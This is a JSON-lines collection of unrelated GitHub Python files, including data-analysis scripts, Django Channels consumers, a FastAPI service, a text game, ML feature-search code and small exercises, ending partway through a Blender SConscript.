+{"seq_id":"16463799368","text":"import jieba.analyse\n\nfile_name = 'D:\\桌面文件\\研究生\\研一课程\\大数据分析\\课程论文\\weibo_clean.txt'\ntopK =200\ncontent = open(file_name, 'rb').read()\n\njieba.analyse.set_stop_words('D:\\桌面文件\\研究生\\研一课程\\大数据分析\\课程论文\\stopwords.txt')\n\nprint('tf-idf : ')\nfor x, w in jieba.analyse.extract_tags(content, withWeight=True, topK=topK):\n    print(x)\nfor x, w in jieba.analyse.extract_tags(content, withWeight=True, topK=topK):\n    print(w)\n    # print('%s %s' % (x, w))\n\n# print('TextRank : ')\n# for x, w in jieba.analyse.textrank(content, withWeight=True, topK=topK):\n#     print('%s %s' % (x, w))\n","repo_name":"wuhuairline/public-data-analysis","sub_path":"tf-idf-jieba.py","file_name":"tf-idf-jieba.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"28189641091","text":"import pandas as pd\nfrom tqdm import tqdm\nimport numpy as np\n\n# Load and preprocess data from file\ndef load_data(file):\n    df = pd.read_csv(file)\n    if (\"Unnamed: 10\" in df.columns): df = df.drop(\"Unnamed: 10\", axis =1)\n    # Convert to Categorical\n    sex_map = {\"M\": 0, \"F\": 1}\n    mstatus_map = {\"single\":0, \"married\":1, \"widowed\":2, \"divorced\":3}\n    occupation_map = {'legal':0, 'IT':1, 'government':2, 'manuf':3, 'retired':4, \n                    'finance':5,'construct':6, 'education':7, 'medicine':8}\n    education_map = {'postgrad':3, 'secondary':0, 'tertiary':1, 'professional':2}\n    df[\"sex\"] = df[\"sex\"].map(sex_map)\n    df[\"mstatus\"] = df[\"mstatus\"].map(mstatus_map)\n    df[\"occupation\"] = df[\"occupation\"].map(occupation_map)\n    df[\"education\"] = df[\"education\"].map(education_map)    \n    return df\n\n# Expected profit for given customer\ndef expected_profit_customer(cip, product):\n    adj_cip = 0\n    if product == 'A':\n        adj_cip = cip * 0.6\n    if product == 'B':\n        adj_cip = cip\n    return adj_cip\n\n# Compute expected profit for customers selected for campaign\ndef expected_profit_campaign_predicted(model, expert, df, save_csv=False): \n    cust_predict = []\n    product_predict = model.predict(df)\n    for index in tqdm(range(len(df))): \n        row = df.loc[index]\n        cip = expert.predict(row)\n        product = product_predict[index]\n        expected_profit = expected_profit_customer(cip, product)\n        cust_predict.append([df.loc[index, \"index\"], product, cip, expected_profit])    \n    \n    cust_predict_df = pd.DataFrame(cust_predict, columns=[\"index\", 
\"product\", \"cip\", \"expected profit\"])\n cust_predict_df_sorted = cust_predict_df.sort_values(by=[\"expected profit\"], ascending=False)\n cust_campaign_400 = cust_predict_df_sorted[:400]\n \n if save_csv:\n cust_predict_df.to_csv(\"data/Cust_Predict.csv\", index=False)\n cust_campaign_400.to_csv(\"data/Cust_Predict_400.csv\", index=False)\n\n expected_profit_campaign = np.sum(cust_campaign_400[\"expected profit\"].values)\n\n return expected_profit_campaign, cust_campaign_400[\"index\"].values\n\n# Compute actual profit for customers selected for campaign\ndef expected_profit_campaign_actual(df):\n profit = []\n for index in range(len(df)):\n profit.append(expected_profit_customer(df.loc[index, \"cust Investment Potential Score\"], \n df.loc[index, \"status\"]))\n \n df[\"profit\"] = profit\n df_sorted = df.sort_values(by=[\"profit\"], ascending=False)\n df_sorted_400 = df_sorted[:400]\n expected_profit = np.sum(df_sorted_400[\"profit\"].values)\n \n return expected_profit, df_sorted_400[\"index\"].values\n\n# Compute actual profit corresponding to predicted indexes\ndef expected_profit_campaign_predicted_actual(df, indexs):\n profit = []\n for index in indexs:\n profit.append(expected_profit_customer(df.loc[index, \"cust Investment Potential Score\"], \n df.loc[index, \"status\"]))\n \n expected_profit = np.sum(profit)\n\n return expected_profit\n\n# Return the number of matches between actual and predicted\ndef matches_count(actual, predicted):\n matches = set(actual) & set(predicted)\n return len(matches)","repo_name":"sidd-pandey/Fuzzy-GA","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73012994085","text":"import setuptools\n\nimport multicomma\n\nwith open(\"README.md\", \"r\") as readme:\n\tlong_description = readme.read()\n\nsetuptools.setup(\n\tname=\"MultiComma\",\n\tversion=multicomma.__version__,\n\turl=\"https://github.com/darricktheprogrammer/multicomma\",\n\n\tauthor=\"Darrick Herwehe\",\n\tauthor_email=\"darrick@exitcodeone.com\",\n\n\tdescription=\"Placeholder text for short description\",\n\tlong_description=long_description,\n\tlicense=\"MIT\",\n\n\tpackages=setuptools.find_packages(),\n\n\tinstall_requires=[],\n\n\tclassifiers=[\n\t\t\"Development Status :: 2 - Pre-Alpha\",\n\t\t\"Programming Language :: Python\",\n\t\t\"Programming Language :: Python :: 3\",\n\t\t\"Programming Language :: Python :: 3.9\",\n\t],\n)\n","repo_name":"darricktheprogrammer/MultiComma","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70924526565","text":"from Job import JOB\nimport pandas\n\n# weight = [0.2,0.2,0.5,0.1]\ndef ReadData(path, J ):\n Read = open(path + \".csv\", 'r')\n R2 = open(path + '_Mj.csv')\n df = pandas.read_csv(path + \".csv\")\n des = df.describe()\n\n Read.readline()\n i = 0\n for line in Read.readlines():\n line = line.strip().split(',')\n j = JOB()\n j.index = i\n i += 1\n j.processing_time = int(line[0])\n j.release_date = int(line[1])\n j.pieces = int(line[2])\n j.weight = int(line[3])\n j.Temperature = int(line[4])\n j.due_date = int(float(line[5]))\n j.WP = j.pieces * j.weight / j.processing_time\n\n j.processing_time_n = (j.processing_time - des['p'][\"min\"]) / (des['p'][\"max\"] - des['p'][\"min\"])\n j.pieces_n = (j.pieces - des['w'][\"min\"]) / (des['w'][\"max\"] 
- des['w'][\"min\"])\n j.weight_n = (j.weight - des['v'][\"min\"]) / (des['v'][\"max\"] - des['v'][\"min\"])\n j.due_date_n = (j.due_date - des['d'][\"min\"]) / (des['d'][\"max\"] - des['d'][\"min\"])\n j.release_date_n = (j.release_date - des['r'][\"min\"]) / (des['r'][\"max\"] - des['r'][\"min\"])\n\n\n\n J.append(j)\n # print(path)\n index = 0\n for line in R2.readlines():\n line = line.strip().split(',')\n for item in line:\n if item != '':\n J[index].Mj.append(int(item))\n\n index += 1\n","repo_name":"AsheeHuang/Multi_objective_scheduling","sub_path":"ReadData.py","file_name":"ReadData.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18867206591","text":"from sys import exit\nimport os\nfrom halfling import Halfling\nimport events\nimport hud\n\n\ndef start():\n title()\n print(\"1. Start\\n2. Quit\")\n choice = input(\"> \")\n if choice == \"1\":\n return True\n if choice == \"2\":\n return False\n print(\"Invalid input.\")\n return start()\n\n\ndef title():\n line_length = 60\n game_name = '\" P O T A T O \"'\n game_desc = \"A pen and paper RPG by Oliver Darkshire\"\n game_desc2 = \"Coded by Cody Mills\"\n plot = f\"{'-'*60}\\nyou are a halfling, just trying to exist\\nmeanwhile, the dark lord rampages across the world\\n you do not care about this. you are trying to farm potatoes\\n because what could a halfling possibly do about it anyway\\n{'-'*60}\\n\"\n print(\n f\"\\n{game_name.center(line_length)}\\n{game_desc.center(line_length)}\\n{game_desc2.center(line_length)}\"\n )\n lines = plot.split(\"\\n\")\n for line in lines:\n print(line.center(line_length))\n\n\ndef play(player):\n potato_str = \"a potato\"\n if player.danger_level > 1:\n potato_str = f\"{player.danger_level} potatoes\"\n print(f\"\\n1. Advance to the next day.\\n2. Hurl {potato_str} at an orc.\\n3. Quit\")\n choice = input(\"> \")\n return choice\n\n\ndef game_loop(player, hud_style=\"basic_interface\"):\n while not events.end_state(player):\n print(hud.display(player, hud_style))\n player_input = play(player)\n if player_input == \"1\":\n events.grass_and_mud(player, events.roll())\n player.turn += 1\n elif player_input == \"2\":\n hurled = events.hurling_in_the_back_garden(player)\n if hurled:\n player.turn += 1\n elif player_input == \"3\":\n print(\"See ya!\")\n exit(0)\n print(hud.display(player, hud_style))\n\n\ndef play_again(player):\n choice = input(\"Play again? (y/n)\\n> \")\n if choice[0].lower() == \"y\":\n print(\"\\n\")\n player.reset()\n return\n if choice[0].lower() == \"n\":\n print(\"See ya!\")\n exit(0)\n print('Invalid input. 
Please enter \"y\" or \"n\".')\n play_again(player)\n\n\ndef main():\n player = Halfling()\n if start():\n hud_style = hud.choose_style()\n while True:\n game_loop(player, hud_style)\n play_again(player)\n else:\n print(\"See ya!\")\n exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"codymillscodes/cs50p","sub_path":"PS9/project/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30572055726","text":"import asyncio\nimport random\n\nfrom .exceptions import RemoteMethodError\n\nclass MethodCall:\n '''An internal representation of a method call'''\n \n def __init__(self):\n self._id = str(random.randint(1, 1000000))\n self._returned = asyncio.Event()\n \n self._error, self._result = None, None\n \n async def __wait__(self):\n await self._returned.wait()\n \n if self._error:\n raise RemoteMethodError(self._error.get('message', self._error))\n else:\n return self._result\n\n async def __result__(self, error, result):\n self._error, self._result = error, result\n self._returned.set()\n","repo_name":"hunternet93/ddp_asyncio","sub_path":"ddp_asyncio/methodcall.py","file_name":"methodcall.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"35781776037","text":"# chat/consumers.py\nimport json\nfrom asgiref.sync import async_to_sync, sync_to_async\nimport json\nfrom channels.generic.websocket import AsyncWebsocketConsumer\nfrom channels.db import database_sync_to_async\nfrom django.contrib.auth import get_user_model\nfrom chat.models import UserProfileModel\nfrom users.models import AppUser\n\n\nclass ChatConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n current_user_id = self.scope['user'].id if self.scope['user'].id else int(self.scope['query_string'])\n other_user_id = self.scope['url_route']['kwargs']['id']\n self.room_name = (\n f'{current_user_id}-{other_user_id}'\n if int(current_user_id) > int(other_user_id)\n else f'{other_user_id}-{current_user_id}'\n )\n print(self.room_name)\n self.room_group_name = f'chat_{self.room_name}'\n await self.channel_layer.group_add(self.room_group_name, self.channel_name)\n await self.accept()\n await self.send(text_data=self.room_group_name)\n\n async def disconnect(self, close_code):\n await self.channel_layer.group_discard(self.room_group_name, self.channel_layer)\n await self.disconnect(close_code)\n\n async def receive(self, text_data):\n text_data_json = json.loads(text_data)\n message = text_data_json[\"message\"]\n\n # Send message to room group\n await self.channel_layer.group_send(\n self.room_group_name, {\"type\": \"chat_message\", \"message\": message}\n )\n\n async def chat_message(self, event):\n message = event[\"message\"]\n\n # Send message to WebSocket\n await self.send(text_data=json.dumps({\"message\": message}))\n\n\nclass NotificationConsumer(AsyncWebsocketConsumer):\n async def connect (self):\n my_id = self.scope ['user'].id\n self.room_group_name = f'{my_id}'\n await self.channel_layer.group_add(\n self.room_group_name,\n self.channel_name\n )\n await self.accept()\n\n async def disconnect (self, code):\n self.channel_layer.group_discard(\n self.room_group_name,\n self.channel_name\n )\n\n\n async def send_notification (self, event):\n data = json.loads(event.get('value'))\n count = data ['count']\n print(count)\n await self.send(text_data = json.dumps({\n 'count': 
count\n        }))\n\n\nclass OnlineStatusConsumer(AsyncWebsocketConsumer):\n    async def connect (self):\n        self.room_group_name = 'user'\n        await self.channel_layer.group_add(\n            self.room_group_name,\n            self.channel_name\n        )\n\n        await self.accept()\n\n    async def receive (self, text_data=None, bytes_data=None):\n        data = json.loads(text_data)\n        username = data ['username']\n        connection_type = data ['type']\n        print(connection_type)\n        await self.change_online_status(username, connection_type)\n\n    async def send_onlineStatus (self, event):\n        data = json.loads(event.get('value'))\n        username = data ['username']\n        online_status = data ['status']\n        await self.send(text_data = json.dumps({\n            'username' : username,\n            'online_status': online_status\n        }))\n\n    async def disconnect (self, message):\n        await self.channel_layer.group_discard(\n            self.room_group_name,\n            self.channel_name\n        )\n\n    @database_sync_to_async\n    def change_online_status (self, username, c_type):\n        user = AppUser.objects.get(username = username)\n        userprofile = UserProfileModel.objects.get(user = user)\n        if c_type == 'open':\n            userprofile.online_status = True\n            userprofile.save()\n        else:\n            userprofile.online_status = False\n            userprofile.save()","repo_name":"fathertime555/Capstone-Project","sub_path":"chat/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
+{"seq_id":"8406520196","text":"import pandas as pd\n\ndata : pd.DataFrame = pd.read_csv(\"./WorldCupMatches.csv\")\ndata_2 : pd.DataFrame = pd.read_csv(\"./WorldCups.csv\")\ndata.drop(range(850,4568), inplace=True)\nprint(data.shape)\n\ndef getHeadToHeadMatches(country1, country2):\n    headtohead = data[((data[\"Home Team Name\"] == country1) & (data[\"Away Team Name\"] == country2)) | ((data[\"Home Team Name\"] == country2) & (data[\"Away Team Name\"] == country1))]\n    #print(headtohead)\n    win_dict = dict()\n    win_dict[country1] = 0\n    win_dict[country2] = 0\n    win_dict[\"draw\"] = 0\n    for index,match in headtohead.iterrows():\n        if(match[\"Home Team Name\"] == country1 and match[\"Away Team Name\"] == country2):\n            goal_diff = int(match[\"Home Team Goals\"]) - int(match[\"Away Team Goals\"])\n            if goal_diff > 0:\n                win_dict[country1]+=1\n            elif goal_diff == 0:\n                win_dict[\"draw\"]+=1\n            else:\n                win_dict[country2]+=1\n        elif (match[\"Home Team Name\"] == country2 and match[\"Away Team Name\"] == country1):\n            goal_diff = int(match[\"Home Team Goals\"]) - int(match[\"Away Team Goals\"])\n            if goal_diff > 0:\n                win_dict[country2]+=1\n            elif goal_diff == 0:\n                win_dict[\"draw\"]+=1\n            else:\n                win_dict[country1]+=1\n    return {\"data\" : list(win_dict.values()), \"labels\" : list(win_dict.keys())}\n    \ndef getAverageGoals():\n    average_goals = {}\n    years = pd.unique(data[\"Year\"])\n    years = years[~pd.isnull(years)]\n    for year in years:\n        matches = data[data[\"Year\"] == year]\n        total_goals = 0\n        for index,match in matches.iterrows():\n            total_goals += match[\"Home Team Goals\"] + match[\"Away Team Goals\"]\n        total_matches = matches.shape[0]\n        average_goals[int(year)] = round((total_goals/total_matches),2)\n    return [{\"Year\" : k, \"goals\" : v} for k,v in average_goals.items()]\n\ndef number_of_worldcups():\n    worldcups = {}\n    finals = data[data[\"Stage\"]==\"Final\"]\n    for index,match in finals.iterrows():\n        if match[\"Home Team Goals\"] > match[\"Away Team Goals\"]:\n            if match[\"Home Team Name\"] in worldcups.keys():\n                worldcups[match[\"Home Team Name\"]] +=1\n            else:\n                worldcups[match[\"Home 
Team Name\"]] =1\n elif match[\"Home Team Goals\"] < match[\"Away Team Goals\"]:\n if match[\"Away Team Name\"] in worldcups.keys():\n worldcups[match[\"Away Team Name\"]] +=1\n else:\n worldcups[match[\"Away Team Name\"]] =1\n else:\n winner = match[\"Win conditions\"].split(\" \")[0]\n if winner in worldcups.keys():\n worldcups[winner] +=1\n else:\n worldcups[winner] = 1\n winners = []\n winners = [{\"country\" : k, \"cups\" : v} for k,v in worldcups.items()]\n print(winners)\n return winners\ndef goalsScorePerWorldCup():\n result = data_2[[\"Year\",\"GoalsScored\"]]\n print(result)\n result_dict = [{\"Year\" : int(val[\"Year\"]), \"goals\" : int(val[\"GoalsScored\"])} for indx, val in result.iterrows()]\n return result_dict\n\ndef attendanceInWorldCups():\n result = data_2[[\"Year\",\"Attendance\"]]\n print(result)\n result_dict = [{\"Year\" : int(val[\"Year\"]), \"people\" : int(val[\"Attendance\"])} for indx, val in result.iterrows()]\n return result_dict\n\ndef popularMatchesByTeam(country):\n matches = data[(data[\"Away Team Name\"] == country) | (data[\"Home Team Name\"] == country)]\n match_data = matches.groupby(\"Year\").sum(\"Attendance\")\n attendance = match_data[[\"Attendance\"]].to_dict()\n result_dict = [ {\"Year\" : int(k), \"people\" : int(v)}for k,v in attendance[\"Attendance\"].items()]\n return result_dict\n\n#opularMatchesByTeam(\"Germany\")\n#attendanceInWorldCups()","repo_name":"captainCommit/cms-stats","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11091678292","text":"import uvicorn\nfrom fastapi import FastAPI, APIRouter, Request\n\nfrom app.db import init_databases, shutdown_databases\nfrom app.models import GetModelNamesResponse, GetLevelRequest, GetLevelResponse\nfrom app.routes.get_level import _get_level\nfrom app.routes.get_model_names import _get_model_names\nfrom app.settings import load_config, CONFIG\nfrom app.settings.consts import VERSION, SERVICE_NAME, MSG_SERVICE_DESCRIPTION\nfrom app.settings.logging import init_logging\n\nrouter = APIRouter()\n\n\n@router.on_event(\"startup\")\nasync def startup():\n await init_databases(CONFIG)\n\n\n@router.on_event(\"shutdown\")\nasync def shutdown():\n await shutdown_databases()\n\n\n@router.get(\"/self_check\")\nasync def self_check(r: Request):\n return {\"status\": \"Ok\"}\n\n\n@router.get(\"/get_model_names/\")\nasync def get_model_names() -> GetModelNamesResponse:\n \"\"\"\n идем в монгу и просим коллекции вида: \"MODEL_{days_back}_{days_forward}\"\n Отдаем json вида:\n {\n 'data': [\n { 'name': 'string', 'id': 'mongo_collection_name' }\n ]\n }\n \"\"\"\n response = await _get_model_names()\n return response\n\n\n@router.post(\"/get_level/\")\nasync def get_level(r: GetLevelRequest) -> GetLevelResponse:\n \"\"\"\n идем в монгу и просим уровень коллекции вида: \"MODEL_{days_back}_{days_forward}\"\n \"\"\"\n response = await _get_level(level_id=r.level_id, model_id=r.model_id)\n if response is None:\n return { 'status': \"No level\" }\n return response\n\n\ndef init_app():\n load_config()\n init_logging()\n\n app = FastAPI(\n title=SERVICE_NAME, description=MSG_SERVICE_DESCRIPTION, version=VERSION,\n )\n\n app.include_router(router, prefix=f\"/{SERVICE_NAME}\")\n\n return app\n\n\ndef run():\n app = init_app()\n uvicorn.run(app, host=\"0.0.0.0\", port=8080)\n\n\nif __name__ == \"__main__\":\n 
run()\n","repo_name":"comptech-winter-school/stock-news","sub_path":"backend/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"44594557576","text":"# 7. Reverse Integer\r\n\r\n# Example 1:\r\n# Input: x = 123\r\n# Output: 321\r\n\r\n# Example 2:\r\n# Input: x = -123\r\n# Output: -321\r\n\r\n# Example 3:\r\n# Input: x = 120\r\n# Output: 21\r\n\r\ndef reverse(self, x: int) -> int:\r\n if x > 0:\r\n answer = int(str(x)[::-1])\r\n if answer >= -(2**31) and answer <= (2**31 - 1):\r\n return answer \r\n else: \r\n return 0\r\n else:\r\n answer = int(str(-x)[::-1]) * -1\r\n if answer >= -(2**31) and answer <= (2**31 - 1):\r\n return answer \r\n else: \r\n return 0","repo_name":"MothScientist/leetcode_solutions","sub_path":"7. Reverse Integer.py","file_name":"7. Reverse Integer.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"45964663346","text":"from mlapp.main import MLApp\nfrom mlapp.config import settings\nimport pandas as pd\n\nif __name__ == \"__main__\":\n config = {\n 'handler_name': 'handler',\n 'files': [{\n 'table_name': 'table',\n 'file_name': 'file_name.csv'\n }]\n }\n\n mlapp = MLApp({'env_file_path': 'path/to/.env'})\n handlers = {}\n for service_name in settings.get('services', []):\n service_item = settings['services'][service_name]\n try:\n handlers[service_name] = service_item['handler'](service_item.get('settings', {}))\n except Exception as e:\n if service_item['handler'] is None:\n raise Exception(\"{} service is missing a python library installation.\".format(service_name))\n else:\n raise e\n\n for item in config['files']:\n df = pd.read_csv(item['file_name'])\n handlers[config['handler_name']].insert_df(item['table_name'], df)\n\n","repo_name":"IBM/mlapp","sub_path":"scripts/export_local_data.py","file_name":"export_local_data.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"52"} +{"seq_id":"35393848364","text":"import pandas as pd\nimport numpy as np\nimport matplotlib\nimport sys\nimport os\nimport random\nimport pickle\nimport joblib\n\nfrom itertools import combinations\nfrom statsmodels import robust\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import StratifiedKFold\n\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom xgboost import XGBClassifier\nfrom xgboost import plot_tree\nimport shap\n\nfrom itertools import cycle\nfrom scipy import interp\n\n# Parameters\nLABEL_COLUMN_NAME = 'bug'\nUNWANTED_COLUMNS = []\n\nWANTED_COLUMNS = [\n 'dit', 'noc', 'cbo', 'rfc', 'lcom', 'ca', 'ce', 'npm', 'lcom3', 'loc', 'dam', 'moa', 'mfa', 'cam', 'ic', 'cbm', 'amc', 'max_cc', 'avg_cc'\n ]\n\nN_FOLDS = 5\nRANDOM_STATE = 1\n\nn_estimators = 20\nsubsample = 0.60\nlr = 0.1\nmax_depth = 10\n\ntotal = 0\nbest_models = 0\nbest_generated_model = 0\nfeat = []\n\nmodels = []\n\nfor c in range(1,50):\n feat.append('feature')\n\ndef random_combinations(iterable, r, x):\n pool = tuple(iterable)\n n = len(pool)\n a = []\n for i in range(x):\n indices = sorted(random.sample(range(n), r))\n a.insert(len(a),tuple(pool[i] for i in indices))\n return list(set(a))\n\ndef eval_features(df, features):\n #global total\n #global best_models\n global models\n # control de id of the classifier\n id = 0\n\n #total = total + 
1\n\n X = df[features].values\n y = df[LABEL_COLUMN_NAME].values\n a = []\n b = []\n cv = StratifiedKFold(n_splits=N_FOLDS, shuffle=True, random_state=RANDOM_STATE)\n for (train, val) in cv.split(X, y):\n classifier = XGBClassifier(n_estimators=n_estimators, subsample=subsample, learning_rate=lr, max_depth=max_depth, n_jobs=16, random_state=1)\n\n classifier = classifier.fit(X[train], y[train])\n\n #location = \"models/bugpred%s.joblib.dat\" % (id)\n if (id == 3):\n models.append(classifier)\n id = id + 1\n #dump(classifier, location)\n #pickle.dump(classifier, open('models_xgb.sav', 'wb'))\n\n probas_ = classifier.predict_proba(X[val])\n area = roc_auc_score(y[val], probas_[:, 1])\n a.insert(len(a), area)\n\n for i in probas_[:, 1]:\n b.append(i)\n\n return a,b\n\ndef eval_panel(df, comb):\n for ff in comb:\n f = []\n for x in ff:\n f.insert(len(f),x)\n A,B = eval_features(df, f)\n #print(\"%s,%f,%s,%s\" % (f, np.mean(A),A,B))\n #check_best_models(A,f)\n print(\"%s,%f\" % (f, np.mean(A)))\n #file_features.write(str(f) + \"\\n\")\n #file_auc.write(str(np.mean(A)) + \"\\n\")\n sys.stdout.flush()\n\ndef check_best_models(acc,features):\n global best_models, best_generated_model, feat\n\n model_accuracy = np.mean(acc)*100\n\n # check the number of models above the baseline model\n if (model_accuracy > 78.5):\n best_models = best_models + 1\n if (len(features) < len(feat)):\n feat = features\n # check the highestes model achieved\n if (model_accuracy > best_generated_model):\n best_generated_model = model_accuracy\n \n\n# Reads dataset\ndf_mblood = pd.read_csv(sys.argv[1])\n\n# Maps label\ndf_mblood.dropna(axis=0, subset=['bug'], inplace=True)\n\n#all_features = list(df_mblood.columns)\n#for f in UNWANTED_COLUMNS + [LABEL_COLUMN_NAME]:\n# all_features.remove(f)\n\nRANDOM_STATE = 1\nf = []\ni = 0\n#for f1 in all_features:\nfor f1 in WANTED_COLUMNS:\n if i == 20: break\n if f1 in f: continue\n k = 0\n x = f1\n i = i + 1\n j = 0\n avg = 0\n# for f2 in all_features:\n for f2 in WANTED_COLUMNS:\n if f2 in f: continue\n j = j + 1\n f.insert(len(f), f2)\n A,B = eval_features(df_mblood, f)\n #print(\"%s,%f,%s,%s\" % (f,np.mean(A),A,B))\n #check_best_models(A,f)\n print(\"%s,%f\" % (f,np.mean(A)))\n #file_features.write(str(f) + \"\\n\")\n #file_auc.write(str(np.mean(A)) + \"\\n\")\n f.remove(f2)\n sys.stdout.flush()\n avg = avg + np.mean(A)\n if np.mean(A) > k:\n x = f2\n k = np.mean(A)\n avg /= j\n f.insert(len(f), x)\n\nfor c in range(1,5):\n s = 50000\n comb = random_combinations(WANTED_COLUMNS, c, s)\n eval_panel(df_mblood, comb)\n\n#percentage = (best_models / total) * 100\n\n#with open('../reports/pde.txt', 'w') as f:\n# print(\"Total number of models: %i\\nBest achieved model: %f\\nFeatures related to the smallest set of features: %s\\nNumber of best models: %i \\nPercentage of best models: %f\" % (total,best_generated_model,feat,best_models,percentage), file=f)\n\njoblib.dump(models, 'models.pkl')\n\nprint('program complete!!!')","repo_name":"gesteves91/ck-metrics","sub_path":"src/exploration_models.py","file_name":"exploration_models.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10199292306","text":"import datetime\n\nfrom entity.episode import Episode\nfrom repository import podcast_repository\nfrom repository import episode_repository\n\n\ndef create_episode(title: str, episode_id: int, index_name: str):\n podcast = podcast_repository.find_by_index_name(index_name)\n episode = 
Episode(\n backnumber=episode_id,\n title=title,\n description=\"\",\n spotifyUrl=\"\",\n applePodcastUrl=\"\",\n postedAt=datetime.datetime.now(),\n podcastId=podcast.id,\n )\n\n episode_repository.create(episode)\n","repo_name":"yuta519/koesagas","sub_path":"transcriber/usecase/episode/create_usecase.py","file_name":"create_usecase.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32708841178","text":"from sqlalchemy.orm import Session\nfrom typing import Optional\n\nfrom db import crud\nfrom api_models.threat import ThreatCreate\nfrom api_models.threat_type import ThreatTypeCreate\nfrom api_models.queue import QueueCreate\n\n\ndef create_or_read(\n value: str, db: Session, description: Optional[str] = None, queues: list[str] = None, types: list[str] = None\n):\n if queues is None:\n queues = [\"external\"]\n\n for queue in queues:\n crud.queue.create_or_read(model=QueueCreate(value=queue), db=db)\n\n if types is None:\n types = [\"test_type\"]\n\n for type in types:\n crud.threat_type.create_or_read(model=ThreatTypeCreate(queues=queues, value=type), db=db)\n\n return crud.threat.create_or_read(\n model=ThreatCreate(description=description, queues=queues, types=types, value=value), db=db\n )\n","repo_name":"seanmcfeely/ace2-ams","sub_path":"db/app/db/tests/factory/threat.py","file_name":"threat.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24290865471","text":"#Simple code to display how an if statement can be used to increment a value\n\n\nclick = False\n\nlike = 0\n\nclick = True\n\nif click == True:\n like += 1\n click = False\n\nprint(like)","repo_name":"geniusdev26/loops_if_statement","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17260913442","text":"\nans = 0\nfor _ in range(int(input())):\n word = input()\n temp = []\n l = len(word)\n i = 0\n while i < l:\n now = word[i]\n if now in temp :\n break\n i += 1\n while i < l and now == word[i]:\n i += 1\n else:\n temp += [now]\n else:\n ans += 1\n\nprint(ans)","repo_name":"Gwanghun-Im/BAEKJOON","sub_path":"210804/1316.py","file_name":"1316.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2227679151","text":"val = int(input(\"How many numbers in the list: \"))\nlist_val = []\n\nfor i in range(val):\n data = int(input(\"Enter {} number: \".format(i+1)))\n list_val.append(data)\n\nsummation = 0\nfor num in list_val:\n summation = summation + num\n\nprint(summation)\n\n# alternatively:\n# s = sum(list_val)\n# print(s)","repo_name":"goku-g/AI-lab_reports","sub_path":"lab-1-intro_python/9-sum_all_list_item.py","file_name":"9-sum_all_list_item.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72248759525","text":"#!/usr/bin/python\nimport sys\nimport os\n\ndef normpath(path):\n return os.path.abspath(os.path.normpath(path))\n\nImport ('env')\ncflags = [] #['-Wall']\ndefines = []\nroot_build_dir=normpath(env['BF_BUILDDIR'])\n\nsource_files = env.Glob('*.c')\nsource_files.remove('rna_access.c')\n\ngenerated_files = 
source_files[:]\ngenerated_files.remove('rna_define.c')\ngenerated_files.remove('makesrna.c')\n\napi_files = env.Glob('*_api.c')\nfor api_file in api_files:\n generated_files.remove(api_file)\n\ngenerated_files = [filename[:-2] + '_gen.c' for filename in generated_files]\n\nmakesrna_tool = env.Clone()\nrna = env.Clone()\nmakesrna_tool.Append(CCFLAGS = '-DBASE_HEADER=\"\\\\\"source/blender/makesrna/\\\\\"\" ')\n\ndefs = []\n\nincs = '#/intern/guardedalloc ../../blenlib ../../blenkernel ../../blenloader'\nincs += ' ../../imbuf ../../makesdna ../../makesrna ../../ikplugin'\nincs += ' ../../windowmanager ../../editors/include ../../blenfont'\nincs += ' ../../render/extern/include'\nincs += ' #/intern/audaspace/intern '\nincs += ' #/extern/glew/include '\n\nif env['WITH_BF_OPENEXR']:\n defs.append('WITH_OPENEXR')\n\nif env['WITH_BF_TIFF']:\n defs.append('WITH_TIFF')\n\nif env['WITH_BF_OPENJPEG']:\n defs.append('WITH_OPENJPEG')\n\nif env['WITH_BF_DDS']:\n defs.append('WITH_DDS')\n\nif env['WITH_BF_CINEON']:\n defs.append('WITH_CINEON')\n\nif 